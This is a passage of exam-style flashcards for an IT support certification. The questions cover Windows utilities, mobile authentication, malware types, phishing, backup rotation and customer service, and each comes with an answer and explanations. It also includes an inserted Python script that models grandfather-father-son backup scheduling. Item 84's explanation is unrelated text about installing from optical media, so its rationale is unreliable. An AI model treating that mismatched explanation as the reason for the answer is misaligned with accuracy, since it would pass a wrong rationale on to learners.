An update fixes or improves the computer’s operating system, drivers, or software. Nothing else is changed, and nothing on the computer is backed up.

If an update to Windows or an application/program causes problems with the computer, it can be rolled back (uninstalled).

84
Q

A remote computer administrator is managing clients in rigorous conditions. The clients keep overheating and often have issues. The administrator wants to run regular checks for damage or corruption. Which of the following will help them accomplish this?

shutdown

gpresult

winver

sfc

A

sfc

Historically, most attended installations and upgrades were run by booting from optical media (CD-ROM or DVD). The optical drive must be set as the priority boot device.

Another problem with disc-based installs is that the setup disc quickly becomes out-of-date. USBs became more popular later on for the ability to load the latest install.

A computer that supports network boot could also be configured to boot to set up over the internet.

Once the OS has been installed, the user will usually want to set the internal hard drive as the default (highest priority) boot device and disable any other boot devices.

85
Q

A new employee calls the help desk because their phone will not connect to the office Wi-Fi. When the technician asks about the phone model, the employee says it is an iPhone 5. The technician immediately knows the problem. Which of the following could be the problem?

Configuration

Signal strength

Interference

Throttling

A

Configuration

Since the technician knew the problem based on the phone model, the most likely cause would involve configuration issues between the device and the wireless access point related to the 802.11 standard or the GHz band.

Signal strength can be affected by distance but not likely by the phone model.

The phone model would not impact interference from other devices or thick walls or metal.

Concerning smartphones, throttling refers to a purposeful reduction in phone performance by a manufacturer’s update to the device that instructs it not to perform at its maximum capabilities.

86
Q

Users perform a technique that tends to select C, M, N, O, and S shapes. Which of the following is this?

Facial recognition

Swipe

PIN

Pattern

A

Pattern

Pattern requires the user to swipe a “join-the-dots” pattern. The pattern method has numerous weaknesses.

Swipe is a gesture that means that access to the device is unauthenticated. Simply swiping across the screen will unlock the device.

Facial recognition is a method that creates a template from a 3-D image of the user’s face. A facial bio gesture has the advantage of using the camera rather than a special sensor.

Personal identification numbers (PINs) are used on most devices to enable screen lock authentication and generate an encryption key. The PIN can act as a primary or backup authentication method.

87
Q

A user has just set up their network and needs to make sure that their network is secure, and no one can log in to the network. Which of the following should the user do?

Perform firmware updates.

Change default passwords.

Consider the physical placement.

Locate the SSID.

A

Change default passwords.

Change the default password to secure the administrator account. Choose a new strong password of 12 characters or more.

Physical placement of any router or network appliance should be made to a secure location. A non-malicious threat actor could damage or power off an appliance by accident.

Firmware updates are important because they allow the user to fix security holes and support the latest security standards.

The service set ID (SSID) is a simple, case-sensitive name by which users identify the WLAN. The factory configuration uses a default SSID that is typically based on the device brand or model, which should be changed so users will recognize the network.

88
Q

A user wants to connect to multiple systems after a single login at only one of the devices. What is this called?

Fingerprint

PIN

SSO

UAC

A

SSO

Single sign-on (SSO) means that a user authenticates once to a device or network to access multiple applications or services.

User account control (UAC) is a Windows security feature designed to protect the system against malicious scripts and attacks that could exploit the powerful privileges assigned to members of the Administrators group.

A personal identification number (PIN) can contain letters and symbols. It is a passcode used to process authentication of a user accessing a system.

A fingerprint is the type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.

89
Q

A user is on a website using an HTTPS URL; the browser displays the information about the certificate in the address bar. What does this certificate validate?

Pop-up blocker

Browser sign-in

Secure connection

Untrusted source

A

Secure connection

A secure connection validates the identity of the host running a site and encrypts communications to protect against snooping.

An untrusted source is when an installer cannot be verified through a digital signature or has been a security risk and is likely to expose the user to unwanted adverts. Some untrusted sources do not block ads or have pop-up blockers.

Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.

Pop-up blockers prevent a website from creating dialogs or additional windows. The pop-up technique was used to show fake advertisements and security warnings.

90
Q

What component storage prevents static electricity from discharging?

Antistatic bags

ESD mats

Dissipative packaging

ESD straps

A

Antistatic bags

Antistatic bags are packages that reduce the risk of ESD because they are coated with a conductive material.

Anti-electrostatic discharge (ESD) straps are worn to dissipate static charges effectively. The band should fit snugly around the wrist or ankle so that the metal stud contacts the skin.

Electrostatic discharge (ESD) mats are used to organize sensitive components. The mats contain a snap connected to the wrist or leg strap.

Dissipative packaging is light pink or blue packaging that reduces the buildup of static in the general vicinity of the contents by being slightly more conductive than normal.

91
Q

A user wants to maximize resource dedication to 3D performance and frame rate. Where should the user go to do this?

Apps

Devices

System

Gaming

A

Gaming

Game mode suspends Windows Update and dedicates resources to supporting the active game app’s 3D performance and frame rate rather than other software or background services.

The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying).

The Devices settings pages contain options for input devices (mice, keyboards, and touch), print/scan devices, and adding and managing other peripherals attached over Bluetooth or USB.

In the Settings app, the Apps group is used to view and remove installed apps and Windows Features.

92
Q

A curious IT administrator notices issues with certain applications invoking the kernel. Which operating system would allow the administrator to change the underlying operating system?

iOS

Android

macOS

iPadOS

A

Android

Android is a smartphone/tablet OS developed by the Open Handset Alliance, primarily driven by Google. Unlike iOS, it is an open-source OS based on Linux.

iOS is the operating system for Apple’s iPhone smartphone and original models of the iPad tablet. Like macOS, iOS is also derived from UNIX and developed as a closed-source operating system.

The iPadOS has been developed from iOS to support the functionality of the latest iPad models (2019 and up).

The macOS is a closed-source operating system that does not allow users to make changes.

93
Q

A server administrator was called in to help a VIP whose computer was accidentally infected with a virus. The administrator wants to revert the computer but still preserve user personalization settings. What should the administrator use?

Third-party drivers

Refresh

Factory partition

Reset

A

Refresh

Windows supports refresh and reset options to try to repair the installation. Using refresh recopies the system files and reverts most system settings to the default but can preserve user personalization settings, data files, and more.

Using the full reset option deletes the existing OS plus apps, settings, and data ready for the OS to be reinstalled.

A factory recovery partition is a tool used by the original equipment manufacturers (OEMs) to restore the OS environment to its ship state. The recovery partition is created on the internal fixed drive.

The OS setup media might not contain drivers for certain hardware devices, but this could be part of an unattended file.

94
Q

Which of the following should generate an alert when the account is disabled or altered?

Restrict login times.

Change default administrator account.

Restrict user permission.

Disable guest account.

A

Change default administrator account.

These default accounts have practical limitations and consequently are the ultimate target for threat actors. Any use of the default administrator account must be logged and accounted for.

The guest account should be disabled because it allows unauthorized access to the computer and may provide some sort of network access too. It is only enabled to facilitate password-less file sharing in a Windows workgroup.

Restrict user permission means some networks have complex requirements for assigning rights. However, the basic principle is that the number of accounts with administrator privileges should be as few as possible.

Restricting login times is typically used to prevent an account from logging in at an unusual time of the day or night or during the weekend.

95
Q

A marketing professional normally sends large files to other team members. The IT department recommended using a shared drive and assisted them in setting it up. The project was a very high priority, so the professional collaborated with several members but started receiving reports that some users could not access it sometimes and others could. They eventually figured out that only 20 people at a time seemed to be able to access it. What is causing the issue?

DNS settings are intermittent.

The share was created on a Windows desktop.

The proxy settings are not properly configured on client machines.

The file server was not properly configured.

A

The share was created on a Windows desktop.

The Share tab in the folder’s Properties dialog can customize permissions, change the share name, and limit the number of simultaneous connections. Windows desktop versions are limited to 20 inbound connections.

If more than 20 users access the share, the data should be stored on file servers rather than local client computers.

The proxy settings will not affect users’ ability to access the file share in this scenario. It could cause issues accessing the internet, however.

If the domain name system (DNS) were causing an issue, the users would not be limited to 20 people. It is possible that load-balanced DNS servers could cause issues if one is incorrect.

96
Q

A security analyst conducts an incident response investigation against suspected malware on a user’s computer. The analyst suspects a certain variant of malware known to beacon out to a command and control server. What command will help them investigate this?

hostname

net use

net user

netstat

A

netstat

The netstat command can investigate open ports and connections on the localhost, which will help to investigate potential command and control connections established by malware on the localhost.

The hostname command returns the name configured on the local machine. The DNS server can also contain records to point machines to the host.

Several net command utilities, such as net use, can be used to view and configure shared resources on a Windows network.

Accounts can be managed at the command line using net user, which must be executed in an administrative command prompt.

97
Q

A vulnerability and risk manager reviews older systems that can only receive critical patches. What are these systems classified as?

Extended support

Beta

End of life

Supported

A

Extended support

During the extended support phase, the product is no longer commercially available, but the vendor issues critical patches.

An end-of-life (EOL) system is one that its developer or vendor no longer supports. EOL systems no longer receive security updates and therefore represent a critical vulnerability.

A public beta phase might be used to gather user feedback. Microsoft operates a Windows Insider Program where users can sign up to use early release Windows versions and feature updates.

When the product is being actively marketed during the supported phase, the vendor releases regular patches to fix critical security and operational issues and feature upgrades to expand OS functionality.

98
Q

Which of the following will block untrusted application sources from running?

Firewall

Failed login attempts

Anti-malware

OS updates

A

Anti-malware

Anti-malware applications designed for mobile devices tend to work more like content filters to block access to known phishing sites and block adware/spyware activity by apps.

Failed login attempts: the device locks for a set period if an incorrect passcode or biometric gesture is used, which deters attempts to guess the passcode or use a spoofed biometric.

OS updates are as critical for a mobile device as they are for a desktop computer. The iOS install base is generally better at applying updates because of its consistent hardware and software platform.

Firewall applications for mobile devices can monitor app activity and prevent connections to ports or IP addresses.

99
Q

A Windows client administrator plans to upgrade their OS in the current environment. What is one of the most important considerations for the upgrade?

Journaling

User training

TPM 2.0

Dynamic Disks

A

User training

Different desktop styles introduced by a new OS version or changing from one OS to another can generate issues as users struggle to navigate the new desktop and file system. An upgrade project must take account of this and prepare training programs.

While the scenario did not specify which OS the administrator was upgrading to, Windows 11 requires a CPU or motherboard supporting trusted platform module (TPM) version 2.

When data is written to an NTFS volume, it is re-read, verified, and logged via journaling. In the event of a problem, the sector concerned is marked as bad and the data relocated.

The Dynamic Disks feature allows multiple physical disks to be combined into volumes.

100
Q

A software engineer uses the "data protection" option for the apps on their mobile device. Data covered by this option is subject to a second round of encryption using a key derived from, and protected by, the user's credentials. What is this method?

Device encryption

Profile security requirements

Remote backup application

Locator application

A

Device encryption

Device encryption is enabled automatically when a user configures a passcode lock on the device.

A remote backup application backs up data, apps, and settings to the cloud. A user may choose the platform vendor's service or a third-party provider such as Dropbox.

Profile security requirements document the details of the secure implementation of a device. These policies are applied to different employees and different sites or areas within the site.

A locator application finds a device if it is lost or stolen. Once set up, the phone’s location can be tracked from any web browser when it is powered on.

101
Q

If an individual is creating an account and cannot think of a strong password, the browser can suggest a strong password to use. What is this feature called?

Ad-blocker

Browser sign-in

Password manager

Secure connection

A

Password manager

Password managers suggest a strong password at each new account sign-up or credential reset and autofill this value when the user needs to authenticate to the site.

Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.

A secure connection validates the identity of the host running a site and encrypts communications to protect against snooping.

Ad blockers use increasingly sophisticated techniques to prevent the display of anything that does not seem to be part of the site's main content or functionality. Many sites detect ad blockers and refuse to display any content while one is enabled.

102
Q

A security analyst notices an unauthorized disclosure of customers’ data at the company. What type of data is breached?

PII

Open-source license

Healthcare data

Chain of custody

A

PII

Personally identifiable information (PII) is data that can be used to identify, contact, or locate an individual, or to impersonate that individual in the case of identity theft. PII is any representation of information that allows the identity of an individual to be reasonably inferred.

An open-source license makes software free to use, modify, and share, and makes the program code it was built from available.

Healthcare data refers to medical and insurance records plus associated hospital and laboratory test results.

The chain of custody form records where, when, and who collected the evidence, handled it subsequently, and stored it.

103
Q

A helpdesk manager assesses older Windows 7 computers their company owns and tries to determine available upgrade paths. Which of the following can NOT be upgraded?

Windows 7 Pro to Windows 10 Home

Windows 10 Home to Windows 10 Pro

Windows 7 Home Premium to Windows 10 Pro

Windows 7 Home to Windows 10 Enterprise

A

Windows 7 Home to Windows 10 Enterprise

Users cannot upgrade from a Home to an Enterprise edition. If users consider an in-place upgrade, they must check that the current OS version is supported as an upgrade path to the intended version.

Users can upgrade from Windows 7 Home Premium to Windows 10 Home or Pro. With Windows, users have to consider the edition when upgrading.

Users can upgrade from Windows 10 Home to Windows 10 Pro.

Downgrading the edition is supported in some circumstances (Windows 7 Professional to Windows 10 Home, for instance), but this only retains documents and other data, not apps and settings.

104
Q

While researching and writing a paper on their home computer, a student notices an alert in the notification area that Windows Defender has expired and needs to be updated. The student is annoyed by the interruption but clicks on the alert and follows the update instructions. Later, the student told their parents that Defender expired, and they installed the update. The student’s parents are panic-stricken. Determine the best reason for the parents’ reaction from the information provided.

A malicious browser push notification tricked the student into a drive-by download.

A malicious browser push notification tricked the student into downloading malware.

The parents know the Windows Defender subscription was recently renewed.

The parents have scheduled all updates to occur during the automatic maintenance window at 2:00am.

A

A malicious browser push notification tricked the student into downloading malware.

One way to infect a host with malware is to misuse the browser push notification system that allows a website to send messages. Often these messages are designed to trick users into installing malware by disguising it as an antivirus update.

While this scenario describes a malicious browser push notification, it is not a drive-by download. In a drive-by attack, the computer is infected with malware simply by visiting a malicious site; there is no user installation.

Defender is Windows' built-in antivirus and firewall product, so it does not expire, and a scheduled update window is irrelevant: a genuine Defender update never presents itself as an expiry notice to click through.

Defender has no subscription to renew because it is built into Windows rather than sold separately (Windows 7 shipped Windows Defender as an anti-spyware tool only; from Windows 8 onward it is a full antivirus product).

105
Q

A technician is talking to a customer about an issue, but the customer is not sure how to locate the issue on their computer, so the technician has the customer tell them step by step to figure out the issue. What type of technique is this?

Be judgemental.

Ask a closed question.

Hang up.

Ask an open-ended question.

A

Ask an open-ended question.

An open-ended question invites the other person to compose a response in their own words, which is what the technician needs when the customer cannot locate the issue themselves.

Closed questions can only be answered with a "yes" or "no" or require some other fixed response.

Hanging up should be guided by whatever policy the organization has in place, but in general, if a customer is abusive or threatening, first issue a caution to warn them about this behavior.

Being judgmental will not help in this situation. Do not assume that the customer lacks knowledge about the system; failing to understand their point of view will only frustrate them further.

106
Q

Which of the following means using clear and concise statements that avoid jargon, abbreviations, and acronyms that a user might not understand?

Cultural sensitivity

Business attire

Formal attire

Proper language

A

Proper language

Proper language also means not being overly familiar with customers: do not use slang phrases or any language that may cause offense. Active listening, a related skill, means making a conscious effort to focus on what the other person is saying.

Cultural sensitivity means being aware of customs and habits used by other people.

Formal attire means matching suit clothes in sober color and minimal accessories or jewelry. This is used for business meetings.

Business casual means smart clothes. Jeans, shorts and short skirts, and T-shirts are not smart workwear. Business casual is typically sufficient for troubleshooting appointments.

107
Q

A teacher wishes to reform education in their school system. They are looking for low-cost operating systems to support education. Which one is best geared towards accomplishing their goal?

Windows

ChromeOS

Linux

macOS

A

ChromeOS

Google develops Chrome OS to run on a specific laptop (Chromebook) and PC (Chromebox) hardware. This hardware is designed for the budget and education markets.

Originally developed by Linus Torvalds, Linux is a fully open-source UNIX-like OS kernel. There are many different Linux distributions (distros), each maintaining its own set of packages.

macOS is only supplied with Apple-built workstations (Apple Mac desktops and Apple iMac all-in-ones) and laptops (Apple MacBooks).

While Microsoft has special discounts and deals for education, Chrome is specifically tailored towards budget and education markets.

108
Q

A threat actor poses as a hiring manager for a company and asks a user for their personal credentials and to log in to a spoofed website that looks genuine. When the user confirms log-in with the spoofed website, their information is obtained. Which of the following is this attack?

Phishing

Shoulder surfing

Whaling

Tailgating

A

Phishing

Phishing uses social engineering techniques to make spoofed electronic communications seem authentic to the victim. A phishing message might convince the user to perform actions, such as installing malware disguised as an antivirus program.

Tailgating is entering a secure area without authorization by following closely behind a person who has been allowed through the door or checkpoint.

Whaling is an attack directed specifically against levels of management in the organization. Upper management may also be more vulnerable to common phishing attacks because of their reluctance to learn basic security procedures.

Shoulder surfing attacks are when the attacker learns a password, PIN, or any secure information by watching the user type it.

109
Q

A Linux server administrator notices a service they do not recognize, although the environment is quite big. They look at the help file for the ksh process, but the documentation seems poor. It does seem to indicate that it provides interactivity, however. What type of program is this?

Backup

Terminal

Antivirus

Updates

A

Terminal

The shell provides a command environment by which a user can operate the OS and applications. Many shell programs are available with Linux, notably Bash, zsh, and ksh (Korn shell).

Products such as Clam AntiVirus (ClamAV) and the Snort Intrusion Prevention System (IPS) can be used to block a range of malware threats and to detect and block attempts to attack or evade the host's security controls.

apt-get is a command interface for the Advanced Packaging Tool (APT). APT is used by Debian distributions and works with .deb format packages.

Linux does not have an “official” backup tool. There are plenty of commercial and open-source backup products for Linux, however. Some examples include Amanda, Bacula, Fwbackups, and Rsync.

110
Q

An administrator uses a backup rotation scheme that labels the backup tapes in generations. What is this called?

Synthetic

GFS

Frequency

3-2-1 backup rule

A

GFS

Grandfather-father-son (GFS) is a backup rotation scheme that labels tapes by generation. Son tapes hold the most recent (typically daily) backups and have the shortest retention period; father tapes hold weekly backups; grandfather tapes hold monthly backups, are the oldest, and have the longest retention period.

The 3-2-1 backup rule is a best-practice maxim (keep three copies of the data, on two different media types, with one copy off site) that users can apply to their backup procedures to check that the solution mitigates the widest possible range of disaster scenarios.

A synthetic full backup is not generated directly from the original data but is instead assembled from other backup jobs.

Frequency is the period between backup jobs. If lost edits would be difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds rather than days.
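The GFS rotation worked through in code, as an added example that is not part of the original flashcards. For any calendar date it returns which generation of tape is written, its label, and the first date that tape may be overwritten. The policy it encodes is an assumption chosen for illustration rather than a standard: backups run Monday to Friday, Monday to Thursday write a son tape, each Friday writes a father tape, and the last Friday of the month writes a grandfather tape instead; the pool sizes and retention periods are likewise assumed.

```python
"""Grandfather-father-son (GFS) tape rotation worked through in code.

Added example; it is not from the original flashcards. Policy assumptions:
Mon-Thu write a son tape, each Friday a father tape, and the last Friday of
the month a grandfather tape. Pool sizes and retention periods are assumed.
"""
import datetime as dt
from typing import Dict, List, Optional, Tuple

POLICY = {
    "son":         {"tapes": 4,  "retention_days": 7},    # Mon-Thu, reused next week
    "father":      {"tapes": 4,  "retention_days": 35},   # one per Friday, kept ~5 weeks
    "grandfather": {"tapes": 12, "retention_days": 365},  # month end, kept a year
}


def is_last_friday(day: dt.date) -> bool:
    """A Friday whose next Friday falls in the following month."""
    return day.weekday() == 4 and (day + dt.timedelta(days=7)).month != day.month


def tape_for(day: dt.date) -> Optional[Tuple[str, str]]:
    """(generation, label) for the backup written on `day`, or None at weekends."""
    wd = day.weekday()  # Monday == 0
    if wd >= 5:
        return None
    if is_last_friday(day):
        n = (day.month - 1) % POLICY["grandfather"]["tapes"] + 1
        return "grandfather", f"GF-{n:02d}"
    if wd == 4:
        # 1st..4th Friday of the month cycles through the father pool
        n = (day.day - 1) // 7 % POLICY["father"]["tapes"] + 1
        return "father", f"F-{n}"
    return "son", f"S-{wd + 1}"  # Mon -> S-1 ... Thu -> S-4


def reusable_from(day: dt.date) -> Optional[dt.date]:
    """First date on which the tape written on `day` may be overwritten."""
    t = tape_for(day)
    if t is None:
        return None
    return day + dt.timedelta(days=POLICY[t[0]]["retention_days"])


def rotation_schedule(start: dt.date, end: dt.date) -> List[Tuple[dt.date, str, str]]:
    """Every (date, generation, label) between start and end inclusive."""
    out = []
    day = start
    while day <= end:
        t = tape_for(day)
        if t is not None:
            out.append((day, t[0], t[1]))
        day += dt.timedelta(days=1)
    return out


def generation_counts(schedule: List[Tuple[dt.date, str, str]]) -> Dict[str, int]:
    """How many tapes of each generation a schedule consumes."""
    counts: Dict[str, int] = {}
    for _, gen, _ in schedule:
        counts[gen] = counts.get(gen, 0) + 1
    return counts


if __name__ == "__main__":
    for day, gen, label in rotation_schedule(dt.date(2024, 1, 22), dt.date(2024, 1, 26)):
        print(day, gen, label, "reusable from", reusable_from(day))
```

The point the schedule makes visible is the trade-off in the retention figures: a son tape is overwritten after a week, so a corruption or ransomware encryption that goes unnoticed for longer than that can only be recovered from a father or grandfather tape, and the grandfather retention sets the oldest point in time the organization can ever return to.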

111
Q

An IT manager is setting up an image for dispatching airplanes at a major airport. They are trying to lock down the image to run only the dispatch service. One of the layers of security is to block unneeded service ports from communicating, such as email. Where should the manager start?

Device Manager

Sound

Windows Firewall

Mail

A

Windows Firewall

Windows Defender Firewall determines which processes, protocols, and hosts can communicate with the local computer over the network.

In account settings, email & accounts are where sign-in credentials for other accounts can be added, such as email or social networking, which allows quick access.

The System page in the Settings app (which includes Sound) presents options for configuring input and output devices, power, remote desktop, notifications, and the clipboard (data copying); it does not control network communication.

Device Manager allows users to view and edit the properties of installed hardware. They can change hardware configuration settings, update drivers, or remove/disable devices.

112
Q

A user receives an unsolicited call from a Microsoft support technician during a normal workday. The technician says the antivirus software on the user’s computer alerted Microsoft of a new malware infection. The technician needs to remote into the user’s computer to fix the problem. What is the technician trying to do?

Address the problem faster with a call rather than a pop-up notification alert.

Circumvent security software.

Address the problem faster with a call rather than an email.

Proactively respond to a virus alert.

A

Circumvent security software.

Microsoft does not make unsolicited support calls and has no way of knowing about a malware alert on an individual's computer. This is a tech support scam: the caller wants remote access so that they can bypass the security software, install their own tools, and steal credentials.

Microsoft would not receive a malware alert from the user's antivirus, and it would not contact the user about one, so the caller is not proactively responding to a real alert.

Using a call instead of an email is not the motive; Microsoft neither calls nor emails users unprompted about infections.

Likewise, a call is not a faster alternative to a pop-up notification; no genuine notification was generated, because Microsoft would never have received an antivirus alert in the first place.

113
Q

An attacker uses a set of tools designed to gain control of a computer and can create a backdoor with system-level privileges without the user noticing. What is this called?

Cryptominer

Keylogger

Rootkit

Ransomware

A

Rootkit

A rootkit is malware that uses an exploit to escalate privileges after installation so that it runs with system (root) privileges and unrestricted access to everything from the root of the file system. It then conceals its processes, files, and network connections from the OS and security tools, which is why the user does not notice the backdoor.

Ransomware is malware that tries to extort money from the victim.

Keylogger is spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.

Cryptominer hijacks the resources of the host to perform cryptocurrency mining. Cryptomining is often performed across botnets which are also referred to as cryptojacking.

114
Q

Which of the following accounts can users set up profile settings to synchronize between devices via the online portal?

Microsoft account

Administrator

Guest user

Local account

A

Microsoft account

Microsoft accounts are managed via an online portal and identified by an email address. Configuring access to an account creates a profile associated with a local account.

A local account is defined on that computer only and stored in a database known as the security account manager (SAM). It cannot be used to sign in to a different computer (and can only reach network resources if the remote host holds a matching local account), and its settings are not synchronized anywhere.

A user account in the Administrators group can perform all management tasks and generally has very high access to all files and other objects in the system.

The Guest account (and the Guests group) is present only for legacy reasons and is disabled by default; its default permissions are otherwise similar to those of the Users group.

115
Q

An attacker can access a computer by executing a lunchtime attack. Which of the following principles were NOT followed that led to this attack?

Log off when not using the computer.

Disable guest accounts.

Secure PII and passwords.

Secure/protect critical hardware.

A

Log off when not using the computer.

Logging off (or locking the desktop) whenever a computer is left unattended is a habit users must develop; a "lunchtime attack" is exactly the case where an attacker uses a session left unlocked. Policies can also configure a screensaver that locks the desktop after a period of inactivity.

Securing personally identifiable information (PII) and passwords means that paper copies of personal and confidential data must not be left where they could be read or stolen.

Securing and protecting critical hardware means users must be alert to the risk of physical theft of devices.

An enabled guest account allows unauthorized access to the computer and may provide some network access too, so guest accounts should be disabled; the account is only enabled to facilitate password-less file sharing in a Windows workgroup.

116
Q

A manager received a document identifying underlying causes and recommended remediation steps to mitigate the risk of repeating an issue. What is this document called?

Incident report

Asset-management database system

Asset tags

Network topology diagram

A

Incident report

An incident report summarizes the incident, its underlying causes, and the recommended remediation, drawing on input from users/customers, technicians, managers, and stakeholders with a business or ownership interest in the response.

Asset tags can be affixed to a device as a barcode label or radio frequency ID (RFID) sticker. An RFID tag is a chip programmed with asset data.

The network topology diagram shows how assets are linked as nodes. A topology diagram can model physical and logical relationships at different levels of scale and detail.

Asset-management database systems can be configured to store details such as type, model, serial number, asset ID, location, user(s), value, and service information.

117
Q

A new employee is going over the site safety handbook about correct ways of carrying objects, so they do not damage the object or get injured. What is this called?

Air filter mask

Lifting techniques

Trip hazard

Safety goggles

A

Lifting techniques

Lifting techniques are included in site safety handbooks and job guidance because lifting a heavy object the wrong way can damage the employee's back, cause muscle strains, and damage the object.

Safety goggles are used to minimize the risk of burns from corrosive materials, such as the broken batteries in cellphones or tablets, or of irritation from particles such as toner or dust.

An air filter mask that fits over the mouth and nose is a recommended face covering when working with compressed air, toner spills, or working in a dusty environment. An air filter mask will not protect the eyes.

Trip hazards are caused by putting any object in pathways where people walk.

118
Q

An attacker uses a technique against a wireless network that allows them to flood access points with too many packets. What is this called?

DDoS

On-path attack

Insider threat

DoS

A

DoS

A denial of service (DoS) attack causes a service at a given host to fail or become unavailable to legitimate users.

An on-path attack is a specific type of spoofing where the threat actor can covertly intercept traffic between two hosts or networks, allowing the threat actor to read and possibly modify the packets.

An insider threat is an employee or other person with immediate access to internal components of the company or organization.

A distributed DoS (DDoS) attack is launched from multiple compromised systems, referred to as a botnet, against its target.

119
Q

A user just installed a new application on their workstation, but the application has issues even starting up. The user has been working on the machine regularly up to this point without any prior issues. Which of the following is most likely the issue?

Firewall

DNS

Personalization

Proxy

A

Firewall

In this scenario, one place to troubleshoot is the host-based firewall. Select “Allow an app through the firewall” to allow or block programs (configure exceptions) from the Windows Firewall status page.

While proxy settings could cause an issue, the user was working fine beforehand, so proxy settings are not likely to be the cause.

If the user has been using the machine without any previous problems it is unlikely that the domain name system (DNS) is the issue.

The Personalization settings allow the users to select and customize themes, which set the appearance of the desktop environment.

120
Q

A security researcher wants to install an older operating system for research and testing. The OS was supplied on a disc. Which installation medium should the researcher use?

Internal hard drive

USB

Optical media

Internet-based

A

Optical media

Historically, most attended installations and upgrades were run by booting from optical media (CD-ROM or DVD). The optical drive must be set as the priority boot device.

Another problem with disc-based installs is that the setup disc quickly becomes out of date. USB media became the more popular installation mechanism because the latest install files can be loaded onto them.

A computer that supports network boot could instead be configured to start setup from a server on the network or over the internet.

Once the OS has been installed, the user will usually want to set the internal hard drive as the default (highest priority) boot device and disable any other boot devices.

121
Q

The electronic health records software application crashes during a busy day at a doctor’s office. The IT consultant for the practice knows that the application backs up data in real-time and has the latest update. Which of the following options is the only one that could potentially fix the crashing issue?

Uninstall and reinstall the application driver.

Try to recover data from temporary files.

Update the application driver.

Uninstall and reinstall the application.

A

Uninstall and reinstall the application.

Since the most recent update to the application has been applied, uninstalling then reinstalling the software is the best option of the available choices.

While preserving data is always a priority, there is no need to do so in this scenario since the application backs up in real-time. Additionally, it will not fix the problem.

Applications/software do not have drivers. Drivers are software that tells the operating system how to interact with their particular device/hardware. Drivers are updated to fix bugs and security holes or optimize the hardware.

Applications/software do not have drivers. Drivers are software that tells the operating system how to interact with their particular device/hardware. Uninstalling and reinstalling drivers is usually done when a device is malfunctioning.

122
Q

A user is about to join a Zoom call and plugs in USB-C headphones with a built-in microphone to the computer’s USB 3 port. A message appears that there are “not enough USB controller resources.” Evaluate the situation and select the best fix for the problem.

Close all running programs to free up memory.

Connect the headphones to a USB 2 port.

Run the SFC to locate and update the USB controller drivers.

Open the Resource Monitor to verify the headphone’s operating system and hardware requirements are compatible with the computer’s existing resources.

A

Connect the headphones to a USB 2 port.

"Not enough USB controller resources" is a common warning with USB 3 ports and is generally caused by connecting too many devices. It also occurs when a single device needs more endpoints than the controller has left to allocate. A USB 2 port is typically served by a separate host controller with its own pool of endpoints, so switching ports often solves the problem.

Closing programs can free up memory on the PC, but it does not address the resource allocation issue of the USB controller.

Verifying requirements and compatibility with the computer system’s resources does not resolve USB Controller problems.

System File Checker (SFC) is a Windows utility that scans and restores system files. It does not update drivers.

123
Q

An administrator for Apple endpoints has heard about roaming profiles on Windows where users can sync certain settings from different devices. Which of the following offers a similar functionality?

Spotlight

Gestures

Keychain

iCloud keychain

A

iCloud keychain

The keychain feature is also available as an iCloud keychain, making the same passwords securely available across all macOS and iOS devices.

The keychain feature helps users manage passwords for these accounts, other websites, and Wi-Fi networks. The regular keychain is just local.

Spotlight Search can be used to find almost anything on macOS. To start a new search, click the magnifying glass in the menu bar.

Macs do not support touch screen interfaces, but they support gesture-enabled Magic Mouse and Magic Trackpad peripherals. To see what gestures are available on the Mac or change any settings, open the Trackpad preference pane.

124
Q

An IT professional helps to fix their friend's computer, which is running extremely slowly, and notices the operating system is the Home edition. Which of the following is the only one of these features that is available in any form on the Home edition?

Hyper-V

RDP

BitLocker

gpedit

A

RDP

Remote Desktop Protocol (RDP) allows a user to connect to a machine and operate it over a network. The Home edition includes the RDP client (Remote Desktop Connection), but it cannot act as an RDP server, so it cannot itself be controlled remotely via RDP.

Group Policy Editor (gpedit.msc) is used to create and apply OS and software application settings. The editor is not available in the Home edition.

BitLocker enables the user to encrypt all the information on a disk drive. BitLocker is not supported in Windows Home edition.

Pro/Enterprise editions support Hyper-V, and the Home edition does not.

125
Q

Which of the following scripting use cases relies on a standard file-copy tool, such as robocopy on Windows?

Automated backups

Installation applications

Remapping network devices

Restarting machines

A

Automated backups

Automated backups are a simple type of backup that can be performed using standard file-copy tools, or the script could call functions of a proper backup utility. The script can be set to run automatically using Windows Task Scheduler or via cron in Linux.

Installation of applications: in Windows, a setup file can be executed in silent mode using the command switches for its installer. In Linux, scripts are often used to compile apps from source code.

Restarting machines: many types of installation or update still require a reboot, which a script can trigger once its other steps complete.

Remapping network drives demonstrates the need for error handling in scripts. A Windows batch file uses the net use command to perform drive mapping.

126
Q

Management provides employees with written policies and procedures to help them fulfill their tasks. Which of the following procedures requires employees to enroll and identify themselves using secure credentials?

Assigned users

New-user setup checklist

End-user termination checklist

Procedures for custom installation of software package

A

New-user setup checklist

The new-user setup checklist is part of the onboarding process for new employees and for employees changing job roles; it includes enrolling the user and issuing them secure credentials for the accounts they need.

The end-user termination checklist is part of the offboarding process for employees who are retiring, changing job roles, or fired. Typical tasks include returning and sanitizing devices, releasing software licenses, and disabling account permissions/access.

Procedures for custom installation of software packages include verifying system requirements, validating download/installation source, confirming license validity, adding the software to change control/monitoring processes, and developing support/training documentation.

Assigned users: hardware assets such as workstations, laptops, smartphones, and tablets, and software licenses, might be assigned to an individual user account, with an inventory list of all products that the user is using.

127
Q

A technician is writing a Linux shell script in which each statement comprising an action the script performs is typically placed on its own line. Which file extension does such a script use by convention?

.bat

.ps1

.sh

.vbs

A

.sh

.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line designating which interpreter to use, such as Bash or Ksh. It includes a series of commands that run consecutively to carry out tasks.

.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.

.vbs is the VBScript file extension. VBScript predates PowerShell. The wscript.exe interpreter executes VBScript by default.

.bat is the Windows batch file extension. A shell script for the basic Windows CMD interpreter is often described as a batch file.

128
Q

A user receives a Windows dialog box pop-up that states 163 viruses were detected by antivirus software. When the user clicks on the pop-up, it states that to get rid of the viruses the user needs to purchase the software’s full version. What type of antivirus does the user have in this scenario?

Rogue

On-access

Defender

Execution control

A

Rogue

